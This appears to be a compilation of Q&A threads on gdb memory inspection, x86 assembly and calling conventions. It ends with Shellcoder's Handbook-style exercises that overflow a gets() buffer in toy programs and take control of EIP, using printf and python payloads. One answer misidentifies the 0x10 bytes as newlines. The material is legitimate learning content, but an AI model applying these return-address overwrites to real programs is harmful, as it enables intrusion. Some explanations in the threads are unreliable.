I am reading a book about hacking and it has a chapter about assembly.
Following is my tiny program written in C.
#include <stdio.h>
int main(int argc, char const *argv[])
{
int i;
for (i = 0; i < 10; i++) {
puts("Hello World!");
}
return 0;
}
And the following is gdb test:
(gdb) break main
Breakpoint 1 at 0x40050f: file main.c, line 7.
(gdb) run
Breakpoint 1, main (argc=1, argv=0x7fffffffe708) at main.c:7
7 for (i = 0; i < 10; i++) {
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400500 <+0>: push rbp
0x0000000000400501 <+1>: mov rbp,rsp
0x0000000000400504 <+4>: sub rsp,0x20
0x0000000000400508 <+8>: mov DWORD PTR [rbp-0x14],edi
0x000000000040050b <+11>: mov QWORD PTR [rbp-0x20],rsi
=> 0x000000000040050f <+15>: mov DWORD PTR [rbp-0x4],0x0
0x0000000000400516 <+22>: jmp 0x400526 <main+38>
0x0000000000400518 <+24>: mov edi,0x4005c4
0x000000000040051d <+29>: call 0x4003e0 <puts#plt>
0x0000000000400522 <+34>: add DWORD PTR [rbp-0x4],0x1
0x0000000000400526 <+38>: cmp DWORD PTR [rbp-0x4],0x9
0x000000000040052a <+42>: jle 0x400518 <main+24>
0x000000000040052c <+44>: mov eax,0x0
---Type <return> to continue, or q <return> to quit---
0x0000000000400531 <+49>: leave
0x0000000000400532 <+50>: ret
End of assembler dump.
The following part is the things that I don't understand. Please note that $rip is the "instruction pointer" and points to 0x000000000040050f <+15>
(gdb) x/x $rip
0x40050f <main+15>: 0x00fc45c7
(gdb) x/12x $rip
0x40050f <main+15>: 0x00fc45c7 0xeb000000 0x05c4bf0e 0xbee80040
0x40051f <main+31>: 0x83fffffe 0x8301fc45 0x7e09fc7d 0x0000b8ec
0x40052f <main+47>: 0xc3c90000 0x1f0f2e66 0x00000084 0x1f0f0000
(gdb) x/8xb $rip
0x40050f <main+15>: 0xc7 0x45 0xfc 0x00 0x00 0x00 0x00 0xeb
(gdb) x/8xh $rip
0x40050f <main+15>: 0x45c7 0x00fc 0x0000 0xeb00 0xbf0e 0x05c4 0x0040 0xbee8
(gdb) x/8xw $rip
0x40050f <main+15>: 0x00fc45c7 0xeb000000 0x05c4bf0e 0xbee80040
0x40051f <main+31>: 0x83fffffe 0x8301fc45 0x7e09fc7d 0x0000b8ec
First command x/x $rip outputs 0x40050f <main+15>: 0x00fc45c7.
Is it the instruction at 0x40050f?
Is 0x00fc45c7 same as mov DWORD PTR [rbp-0x4],0x0 (assembled instruction at 0x40050f)?
Secondly, if it is the instruction, what are those hex numbers from the output of commands x/12x $rip, x/8xw $rip, x/8xh $rip?
As to (1), you got that correct.
As to (2), the x command has up to 3 specifiers: how many objects to print; in which format; and what object size. In all your examples you choose to print as hex (x). As to the first specifier, you ask to print 12, 8, 8 objects.
As to the last specifier in your cases:
x/12x has none, so gdb defaults to assuming you want 4-byte chunks (which GDB calls "words", x86 calls "double words"). Generally, I'd always specify what exactly you want as opposed to falling back on default settings.
x/8xw does the same, for 8 objects, as you explicitly requested dwords now.
(The x command defaults to the last size you used, but the initial default for that on startup is w words)
x/8xh requests half-word sized chunks of 2 bytes, so objects printed in 2 byte chunks. (Half-word relative to GDB's standard 32-bit word size; x86 calls this a "word").
In case you wonder why the concatenation of two neighboring values does not equal what was reported when you printed in dwords, this is because the x86 is a little-endian architecture. What that means is detailed quite well in Erickson's book again - if you look a few pages ahead, he does some calculations you might find helpful. In a nutshell, if you recombine them (2,1) (4,3), ..., you'll see they match.
(gdb) help x
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
t(binary), f(float), a(address), i(instruction), c(char) and s(string),
T(OSType), A(floating point values in hex).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
The specified number of objects of the specified size are printed
according to the format.
Defaults for format and size letters are those previously used.
Default count is 1. Default address is following last thing printed
with this command or "print".
Related
I am trying to write a small program that takes two hard coded character pointers and switches the contents that they point to using an external x86 32bit function located in a .S file. I am using the basic gcc compiler. Here is my C code:
valSwap.c:
#include <stdio.h>
void extern swapMe(char* c, char* d);
int main() {
char* c = "boi";
char* d = "bra";
printf("%s, %s", c, d);
swapMe(c, d);
printf("%s, %s", c, d);
return 0;
}
Before running swapMe(c, d) the strings that c and d point to are quite clear. After running swapMe(c, d) I get a Segmentation Fault. Here is my code for the swapMe external function:
swapMe.S:
.intel_syntax noprefix
.text
.global swapMe
swapMe:
push edi
push esi
mov eax, [esp+4]
mov ecx, [esp+8]
mov edi, [eax]
mov esi, [ecx]
mov [eax], esi
mov [ecx], edi
pop esi
pop edi
ret
Now since swapMe(c, d) is taking in 2 parameters using the cdecl calling convention I should find c and d on the stack at $esp+4 and $esp+8. I tried to print these values to confirm that they are what I expect. Either they are not what I expected or I tried to print them incorrectly:
(gdb) p/s $esp+4
$1 = (void *) 0xffffdb08
(gdb) x/s $esp+4
0xffffdb08: ""
(gdb) p/s *($esp+4)
Attempt to dereference a generic pointer.
(gdb) x/s *($esp+4)
Attempt to dereference a generic pointer.
I also tried printing $eax as a string since I moved the contents of $esp+4 into $eax.
(gdb) p/x $eax
$3 = 0xf7fa0000
(gdb) x/s $eax
0xf7fa0000: "\260=\033"
(gdb) x/s *$eax
0x1b3db0: <error: Cannot access memory at address 0x1b3db0>
(gdb) x/x $eax
0xf7fa0000: 0xb0
I also printed the hex values of c and d before entering swapMe to see if I'm at least getting the correct value:
(gdb) p &c
$12 = (char **) 0xffffdb2c
(gdb) p c
$16 = 0x565556c0 "boi"
(gdb) p &d
$14 = (char **) 0xffffdb28
(gdb) p d
$15 = 0x565556c4 "bra"
I printed a few others values that may be relevant as well:
30x56555621 <swapMe+2> mov eax,DWORD PTR [esp+0x4] 3
30x56555625 <swapMe+6> mov ecx,DWORD PTR [esp+0x8] 3
>30x56555629 <swapMe+10> mov edi,DWORD PTR [eax] 3
30x5655562b <swapMe+12> mov esi,DWORD PTR [ecx]
(gdb) p/x $eax
$8 = 0xf7fa0000
0x56555621 <swapMe+2> mov eax,DWORD PTR [esp+0x4] 3
30x56555625 <swapMe+6> mov ecx,DWORD PTR [esp+0x8] 3
30x56555629 <swapMe+10> mov edi,DWORD PTR [eax] 3
>30x5655562b <swapMe+12> mov esi,DWORD PTR [ecx] 3
30x5655562d <swapMe+14> mov DWORD PTR [eax],esi 3
30x5655562f <swapMe+16> mov DWORD PTR [ecx],edi
p/x $edi
$11 = 0x1b3db0
30x56555621 <swapMe+2> mov eax,DWORD PTR [esp+0x4] 3
30x56555625 <swapMe+6> mov ecx,DWORD PTR [esp+0x8] 3
30x56555629 <swapMe+10> mov edi,DWORD PTR [eax] 3
30x5655562b <swapMe+12> mov esi,DWORD PTR [ecx] 3
>30x5655562d <swapMe+14> mov DWORD PTR [eax],esi 3
30x5655562f <swapMe+16> mov DWORD PTR [ecx],edi
(gdb) p/x $ecx
$19 = 0x565555f5
(gdb) p/x $esi
$20 = 0x8310c483
I don't understand why I'm getting different values when I print the values of $eax, $edi, $ecx, and $esp in swapMe vs when I print the values associated with c and d before calling swapMe. Since swapMe takes in c and d as parameters, I expected to see the same values on the stack when calling swapMe but I do not. I did not see 0xffffdb2c or 0x565556c0 once when printing any registers. Please clarify what I did wrong when calling the function, passing in the parameters, or printing the values in the registers. I'm very new to x86 so I probably made a rookie mistake somewhere.
My very simple tested program
#include<stdio.h>
#include<stdlib.h>
int main()
{
int a = 12345;
printf("%d\n", a);
system("PAUSE");
return 0;
}
After compiled and connected,the EXE file is created.Then I open the EXE file in the Ollydbg:
The picture shows the main() function.But I can't find out what the address of the variable a is. When passing the params to the printf() function,it push 3039 into the stack, then it means the value of the variable a is 3039? No,the value is 12345. So it means the address of the variable a is 00003039? Anyone
Address of the a variable is [ebp-8]. You are seeing 0x3039 assignment, because decimal 12345 is hexadecimal 0x3039. If you change your code to use hex value: int a = 0x12345, results would be more clear:
Numeric constants are usually compiled directly into the code.
so you want to know the address of the variable a.
Extremely simple:
insert this statement into your program.
printf( "address of variable 'a' is: %p\n", &a );
How are we to know the address?
We are not sitting at your computer
and it will be different on most every computer.
Use the suggested call to printf() to learn the 'address'
HOWEVER, due to paging, address translation, virtual addressing, etc. That address is NOT the actual physical address within your computers' memory space.
local variables like in this case, a, are stored in the stack, so they can be discarded when a function execution is finished, so basically a is simply located at the memory address of the local stack frame.
int a = 12345; // MOV DWORD PTR SS:[EBP-8], 3039
printf("%d\n", a);
in this case, a is located in [EBP-8], if you inspect where it is pointing, you can see the value 3039, stored in there of course after the assignment, 3039 is a hex number, which of course 12345 in base 10.
To get better understanding of this, let's modify the program a little bit and debug it in GDB.
C:\Codes>gdb test -q
Reading symbols from C:\Codes\test.exe...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 #include<stdio.h>
2
3 int main()
4 {
5 int a = 12345;
6 int b = 0x12345;
7 printf("Variable a %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", a,a,&a,&a);
8 printf("Variable b %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", b,b,&b,&b);
9 return 0;
10 }
(gdb)
Standard Output
C:\Codes>test
Variable a 12345 (decimal) or 0x3039 (hex), located at 0022FF4C or 0x22ff4c
Variable b 74565 (decimal) or 0x12345 (hex), located at 0022FF48 or 0x22ff48
As you can see, the virtual memory addresses of variable a and b is actually located at 0x22ff4c and 0x22ff48 respectively.
Let's take a look at this program in GDB.
(gdb) break 7
Breakpoint 1 at 0x40135e: file test.c, line 7.
(gdb) run
Starting program: C:\Codes/test.exe
[New Thread 3680.0xed8]
Breakpoint 1, main () at test.c:7
7 printf("Variable a %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", a,a,&a,&a);
(gdb) disassemble
Dump of assembler code for function main:
0x00401340 <+0>: push ebp
0x00401341 <+1>: mov ebp,esp
0x00401343 <+3>: and esp,0xfffffff0
0x00401346 <+6>: sub esp,0x30
0x00401349 <+9>: call 0x401970 <__main>
0x0040134e <+14>: mov DWORD PTR [esp+0x2c],0x3039
0x00401356 <+22>: mov DWORD PTR [esp+0x28],0x12345
=> 0x0040135e <+30>: mov edx,DWORD PTR [esp+0x2c]
0x00401362 <+34>: mov eax,DWORD PTR [esp+0x2c]
0x00401366 <+38>: lea ecx,[esp+0x2c]
0x0040136a <+42>: mov DWORD PTR [esp+0x10],ecx
0x0040136e <+46>: lea ecx,[esp+0x2c]
0x00401372 <+50>: mov DWORD PTR [esp+0xc],ecx
0x00401376 <+54>: mov DWORD PTR [esp+0x8],edx
0x0040137a <+58>: mov DWORD PTR [esp+0x4],eax
0x0040137e <+62>: mov DWORD PTR [esp],0x403024
0x00401385 <+69>: call 0x401be0 <printf>
0x0040138a <+74>: mov edx,DWORD PTR [esp+0x28]
0x0040138e <+78>: mov eax,DWORD PTR [esp+0x28]
0x00401392 <+82>: lea ecx,[esp+0x28]
0x00401396 <+86>: mov DWORD PTR [esp+0x10],ecx
0x0040139a <+90>: lea ecx,[esp+0x28]
0x0040139e <+94>: mov DWORD PTR [esp+0xc],ecx
0x004013a2 <+98>: mov DWORD PTR [esp+0x8],edx
0x004013a6 <+102>: mov DWORD PTR [esp+0x4],eax
0x004013aa <+106>: mov DWORD PTR [esp],0x403064
0x004013b1 <+113>: call 0x401be0 <printf>
0x004013b6 <+118>: mov eax,0x0
0x004013bb <+123>: leave
0x004013bc <+124>: ret
End of assembler dump.
(gdb)
And focus on this line
0x0040134e <+14>: mov DWORD PTR [esp+0x2c],0x3039
0x00401356 <+22>: mov DWORD PTR [esp+0x28],0x12345
As you can see from the previous output, the virtual memory address of variables a and b is actually located at [esp+0x2c] or 0x22ff4c and [esp+0x28] or 0x22ff48 respectively.
while
0x3039 & 0x12345 are the value of variables a and b in hexadecimal.
To verify the memory address of these variables in GDB, use print command as follows:
(gdb) print &a
$1 = (int *) 0x22ff4c
(gdb) print &b
$2 = (int *) 0x22ff48
Also, you might wonder where the address of 0x22ff4c or 0x22ff48 come from.
To understand this, let's check the value of current ESP register
(gdb) info registers esp
esp 0x22ff20 0x22ff20
Then, replace the actual ESP value
[esp+0x2c] = [0x22ff20 + 0x2c] = 0x22ff4c
[esp+0x28] = [0x22ff20 + 0x28] = 0x22ff48
I was taking at this example w.r.t. shellcoder's handbook(second edition), and have some question about the stack
root#bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 void ret_input(void){
2 char array[30];
3
4 gets(array);
5 printf("%s\n", array);
6 }
7 main(){
8 ret_input();
9
10 return 0;
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push ebp
0x08048415 <+1>: mov ebp,esp
0x08048417 <+3>: sub esp,0x24
0x0804841a <+6>: lea eax,[ebp-0x1e]
0x0804841d <+9>: mov DWORD PTR [esp],eax
0x08048420 <+12>: call 0x804832c <gets#plt>
0x08048425 <+17>: lea eax,[ebp-0x1e]
0x08048428 <+20>: mov DWORD PTR [esp],eax
0x0804842b <+23>: call 0x804834c <puts#plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb) break *0x08048420
Breakpoint 1 at 0x8048420: file sc.c, line 4.
(gdb) break *0x08048431
Breakpoint 2 at 0x8048431: file sc.c, line 6.
(gdb) run
Starting program: /root/pentest/sc
Breakpoint 1, 0x08048420 in ret_input () at sc.c:4
4 gets(array);
(gdb) x/20x $esp
0xbffff51c: 0xbffff522 0xb7fca324 0xb7fc9ff4 0x08048460
0xbffff52c: 0xbffff548 0xb7ea34a5 0xb7ff1030 0x0804846b
0xbffff53c: 0xb7fc9ff4 0xbffff548 0x0804843a 0xbffff5c8
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
Breakpoint 2, 0x08048431 in ret_input () at sc.c:6
6 }
(gdb) x/20x 0x0bffff51c
0xbffff51c: 0xbffff522 0x4141a324 0x41414141 0x41414141
0xbffff52c: 0x42424242 0x42424242 0x43434242 0x43434343
0xbffff53c: 0x43434343 0x44444444 0x44444444 0xbffff500
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) ^Z
[1]+ Stopped gdb -q sc
root#bt:~/pentest# printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" | ./sc
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD5�
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD:�
root#bt:~/pentest#
in this example i was taking 48 bytes "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" that to rewrite ret address, and all is work. But when i tried to use example from first edition of this book, i faced with some problem
root#bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push %ebp
0x08048415 <+1>: mov %esp,%ebp
0x08048417 <+3>: sub $0x24,%esp
0x0804841a <+6>: lea -0x1e(%ebp),%eax
0x0804841d <+9>: mov %eax,(%esp)
0x08048420 <+12>: call 0x804832c <gets#plt>
0x08048425 <+17>: lea -0x1e(%ebp),%eax
0x08048428 <+20>: mov %eax,(%esp)
0x0804842b <+23>: call 0x804834c <puts#plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb)
why program has taken 24(hex)=36(dec)bytes for array, but i used 48 that rewrite, 36 bytes of array, 8 bytes of esp and ebp(how i know), but there are steel have 4 unexplained bytes
ok, lets try out the sploit from first edition of book who rewrite all of array by address of call function, in book they had "sub &0x20,%esp" so code is
main(){
int i=0;
char stuffing[44];
for (i=0;i<=40;i+=4)
*(long *) &stuffing[i] = 0x080484bb;
puts(array);
i have ""sub &0x24,%esp" so my code will be
main(){
int i=0;
char stuffing[48];
for (i=0;i<=44;i+=4)
*(long *) &stuffing[i] = 0x08048435;
puts(array);
result of the shellcoders' handbook
[root#localhost /]# (./adress_to_char;cat) | ./overflow
input
""""""""""""""""""a<u___.input
input
input
and my result
root#bt:~/pentest# (./ad_to_ch;cat) | ./sc
5�h���ل$���������h����4��0��˄
inout
Segmentation fault
root#bt:~/pentest#
What's problem?
i was compiling with
-fno-stack-protector -mpreferred-stack-boundary=2
I suggest you better get the amount of bytes necessary to overflow the buffer by trying in GDB. I compiled the source you provided in your question and ran it through GDB:
gdb$ r < <(python -c "print('A'*30)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 29912) exited normally]
(Do note that I use Python to create my input instead of a compiled C program. It really does not matter, use what you prefer.)
So 30 bytes are fine. Let's try some more:
gdb$ r < <(python -c "print('A'*50)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ i r $eip
eip 0x41414141 0x41414141
Our eip register now contains 0x41414141, which is AAAA in ASCII. Now, we can gradually check where exactly we have to place the value in our buffer that updates eip:
gdb$ r < <(python -c "print('A'*40+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x8004242
0x08004242 in ?? ()
B is 0x42. Thus, we overwrote half of eip when using 40 A's and four B's. Therefore, we pad with 42 A's and then put the value we want to update eip with:
gdb$ r < <(python -c "print('A'*42+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
We got full control over eip! Let's try it. Set a breakpoint at the end of ret_input (your addresses may vary as I recompiled the binary):
gdb$ dis ret_input
Dump of assembler code for function ret_input:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x38,%esp
0x0804840a <+6>: lea -0x26(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x26(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
End of assembler dump.
gdb$ break *0x8048421
Breakpoint 1 at 0x8048421
As an example, let's modify eip so once returning from ret_input we end up at the beginning of the function again:
gdb$ r < <(python -c "print('A'*42+'\x04\x84\x04\x08')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
--------------------------------------------------------------------------[code]
=> 0x8048421 <ret_input+29>: ret
0x8048422 <main>: push ebp
0x8048423 <main+1>: mov ebp,esp
0x8048425 <main+3>: and esp,0xfffffff0
0x8048428 <main+6>: call 0x8048404 <ret_input>
0x804842d <main+11>: mov eax,0x0
0x8048432 <main+16>: leave
0x8048433 <main+17>: ret
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048421 in ret_input ()
We pad 42 A's and then append the address of ret_input to our buffer. Our breakpoint on the ret triggers.
gdb$ x/w $esp
0xffffd30c: 0x08048404
On top of the stack there's the last DWORD of our buffer - ret_input's address.
gdb$ n
0x08048404 in ret_input ()
gdb$ i r $eip
eip 0x8048404 0x8048404 <ret_input>
Executing the next instruction pops that value off the stack and sets eip accordingly.
On a side note: I recommend the .gdbinit file from this guy.
This row :
for (i=o;i<=44;i+=4);
Remove the ; from the end. I also assume that the o(letter o) instead of 0(zero) is mistyped here.
The problem is that your for loop is executing ; (a.k.a. do nothing) until i becomes larger then 44, and then you execute the next command with i = 44 wich is outside the bounds of array and you get Segmentation Error. You should watch out for this type of error as it is hardly visible and it is completely valid c code.
The following code prints different results on 32bit and 64bit systems:
#include <stdio.h>
void swapArray(int **a, int **b)
{
int *temp = *a;
*a = *b;
*b = temp;
}
int main()
{
int a[2] = {1, 3};
int b[2] = {2, 4};
swapArray(&a, &b);
printf("%d\n", a[0]);
printf("%d\n", a[1]);
return 0;
}
After compiling it in 32bit system, the output is:
2
3
On 64bit the output is:
2
4
As I understand, the function swapArray just swaps the pointers to the first elements in a and b. So after calling swapArray, a should point to 2 and b should point to 1.
For this reason a[0] should yield 2, and a[1] should reference the next byte in memory after the location of 2, which contains 4.
Can anyone please explain?
Edit:
Thanks to the comments and answers, I now notice that &a and &b are of type int (*)[] and not int **. This obviously makes the code incorrect (and indeed I get a compiler warning). It is intriguing, though, why the compiler (gcc) just gives a warning and not an error.
I am still left with the question what causes different results on different systems, but since the code is incorrect, it is less relevant.
Edit 2:
As for the different results on different systems, I suggest reading AndreyT's comment.
swapArray(&a, &b);
&a and &b are not of type int ** but of type int (*)[2]. BTW your compiler is kind enough to accept your program but a compiler has the right to refuse to translate it.
Before answering your question lets see what happens under the hood during a pointer operation. I'm using a very simple code to demonstrate this :
#include <stdio.h>
int main() {
int *p;
int **p2;
int x = 3;
p = &x;
p2 = &p;
return 0;
}
Now look at the disassembly :
(gdb) disassemble
Dump of assembler code for function main:
0x0000000000400474 <+0>: push rbp
0x0000000000400475 <+1>: mov rbp,rsp
0x0000000000400478 <+4>: mov DWORD PTR [rbp-0x14],0x3
0x000000000040047f <+11>: lea rax,[rbp-0x14]
0x0000000000400483 <+15>: mov QWORD PTR [rbp-0x10],rax
0x0000000000400487 <+19>: lea rax,[rbp-0x10]
0x000000000040048b <+23>: mov QWORD PTR [rbp-0x8],rax
=> 0x000000000040048f <+27>: mov eax,0x0
0x0000000000400494 <+32>: leave
0x0000000000400495 <+33>: ret
The disassembly is pretty self evident. But a few note need to be added here,
My function's stack frame starts from here:
0x0000000000400474 <+0>: push rbp
0x0000000000400475 <+1>: mov rbp,rsp
So lets what they have for now
(gdb) info registers $rbp
rbp 0x7fffffffe110 0x7fffffffe110
here we are putting value 3 in [rbp - 0x14]'s address. lets see the memory map
(gdb) x/1xw $rbp - 0x14
0x7fffffffe0fc: 0x00000003
Its important to notice the DWORD datatype is used, which is a 32 bits wide. So on the side note, integer literals like 3 is treated treated as 4 bytes unit.
Next instruction uses lea to load the effective address of the value just saved in earlier instruction.
0x000000000040047f <+11>: lea rax,[rbp-0x14]
It means that now $rax will have the value 0x7fffffffe0fc.
(gdb) p/x $rax
$4 = 0x7fffffffe0fc
Next we will save this address into memory using
0x0000000000400483 <+15>: mov QWORD PTR [rbp-0x10],rax
Important thing to note that a QWORD which is used here. Because 64bit systems have 8 byte native pointer size. 0x14 - 0x10 = 4 bytes were used in earlier mov instruction.
Next we have :
0x0000000000400487 <+19>: lea rax,[rbp-0x10]
0x000000000040048b <+23>: mov QWORD PTR [rbp-0x8],rax
This is again for the second indirection. always all the value related to addresses are QWORD. This is important thing to take a note of this.
Now lets come to your code.
Before calling to swaparray you have :
=> 0x00000000004004fe <+8>: mov DWORD PTR [rbp-0x10],0x1
0x0000000000400505 <+15>: mov DWORD PTR [rbp-0xc],0x3
0x000000000040050c <+22>: mov DWORD PTR [rbp-0x20],0x2
0x0000000000400513 <+29>: mov DWORD PTR [rbp-0x1c],0x4
0x000000000040051a <+36>: lea rdx,[rbp-0x20]
0x000000000040051e <+40>: lea rax,[rbp-0x10]
0x0000000000400522 <+44>: mov rsi,rdx
0x0000000000400525 <+47>: mov rdi,rax
This is very trivial. Your array is initialized and the effect of & operator is visible when the effective address of the start of array is loaded into $rdi and $rsi.
Now lets see what its doing inside swaparray().
The start of your array is saved into $rdi and $rsi. So lets see their contents
(gdb) p/x $rdi
$2 = 0x7fffffffe100
(gdb) p/x $rsi
$3 = 0x7fffffffe0f0
0x00000000004004c8 <+4>: mov QWORD PTR [rbp-0x18],rdi
0x00000000004004cc <+8>: mov QWORD PTR [rbp-0x20],rsi
Now the first statement int *temp = *a is performed by following instructions.
0x00000000004004d0 <+12>: mov rax,QWORD PTR [rbp-0x18]
0x00000000004004d4 <+16>: mov rax,QWORD PTR [rax]
0x00000000004004d7 <+19>: mov QWORD PTR [rbp-0x8],rax
Now comes the defining moment, what's happening with your *a?
It loads into $rax the value stored in [rbp - 0x18]. where the value $rdi was saved. which in turn holds the address of the first element of the first array.
performs another indirection by using the address stored into $rax to fetch a QWARD and loads it into $rax. So what it will return? it will return a QWARD from 0x7fffffffe100. Which will in effect form a 8 byte quantity from two four byte quantity saved there. To elaborate,
The memory there is like below.
(gdb) x/2xw $rdi
0x7fffffffe100: 0x00000001 0x00000003
Now if you fetch a QWORD
(gdb) x/1xg $rdi
0x7fffffffe100: 0x0000000300000001
So already you are actually screwed. Because you are fetching with incorrect boundary.
The rest of the codes can be explained in similar manner.
Now why its different in 32 bit platform? because in 32 bit platform the native pointer width is 4 bytes. So the thing here will be different there. The main problem with your semantically incorrect code originates from the difference in integer type width and native pointer types. If you have both the same, you may still work around your code.
But you should never write code which assumes the size of native types. That's why standards are for. that's why your compiler is giving you warning.
From language point of view its a type mismatch which is already pointed out in the earlier answers so i'm not going into that.
You can't swap arrays using the pointer trick (they are not pointers!). You would either have to create pointers to those arrays and use the pointers or dynamically allocate the arrays using malloc etc.
The results I get on a 64-bit system are different than yours for example, I get:
2
3
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
And with clang on my mac I get an error:
test.cpp: In function ‘int main()’:
test.cpp:13: error: cannot convert ‘int (*)[2]’ to ‘int**’ for argument ‘1’ to ‘void swapArray(int**, int**)’
I assume that this is undefined behavior and you are trying to interpret what is probably junk output.
I am working on ubuntu 12.04 and 64 bit machine. I was reading a good book on buffer overflows and while playing with one example found one strange moment.
I have this really simple C code:
void getInput (void){
char array[8];
gets (array);
printf("%s\n", array);
}
main() {
getInput();
return 0;
}
in the file overflow.c
I compile it with 32 bit flag cause all example in the book assumed 32 bit machine, I do it like this
gcc -fno-stack-protector -g -m32 -o ./overflow ./overflow.c
In the code char array was only 8 bytes but looking at disassembly I found that that array starts 16 bytes away from saved EBP on the stack, so I executed this line:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x10\x10\x20" | ./overflow
And got:
aaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
Then I opened core file:
gdb ./overflow core
#0 0x20101010 in ?? ()
(gdb) info registers
eax 0x19 25
ecx 0xffffffff -1
edx 0xf77118b8 -143583048
ebx 0xf770fff4 -143589388
esp 0xffef6370 0xffef6370
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0x20101010 0x20101010
As you see EIP in fact got new value, which I wanted. BUT when I want to put some useful values like this 0x08048410
printf "aaaaaaaaaaaaaaaaaaaa\x10\x84\x04\x08" | ./overflow
Program crashes as usual but than something strange happens when I'm trying to observe the value in EIP register:
#0 0xf765be1f in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) info registers
eax 0x61616151 1633771857
ecx 0xf77828c4 -143120188
edx 0x1 1
ebx 0xf7780ff4 -143126540
esp 0xff92dffc 0xff92dffc
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0xf765be1f 0xf765be1f
Suddenly EIP start to look like this 0xf765be1f, it doesn't look like 0x08048410. In fact I noticed that it's enough to put any hexadecimal value starting from 0 to get this crumbled EIP value. Do you know why this might happen? Is it because I'm on 64 bit machine?
UPD
Well guys in comments asked for more information, here is the disassembly of getInput function:
(gdb) disas getInput
Dump of assembler code for function getInput:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x28,%esp
0x0804840a <+6>: lea -0x10(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x10(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
Perhaps code at 0x08048410 was executed, and jumped to the area of 0xf765be1f.
What's in this address? I guess it's a function (libC?), so you can examine its assembly code and see what it would do.
Also note that in the successful run, you managed to overrun EBP, not EIP. EBP contains 0x61616161, which is aaaa, and EIP contains 0x20101010, which is \n\n\n. It seems like the corrupt EBP indirectly got EIP corrupt.
Try to make the overrun 4 bytes longer, and then it should overrun the return address too.
This is probably due to the fact that modern OS (Linux does at least, I don't know about Windows) and modern libc have mechanisms that do not allow code found in stack to be executed.
Buffer overflow is invoking undefined behavior, therefore anything can happen. Theorizing what might happen is futile.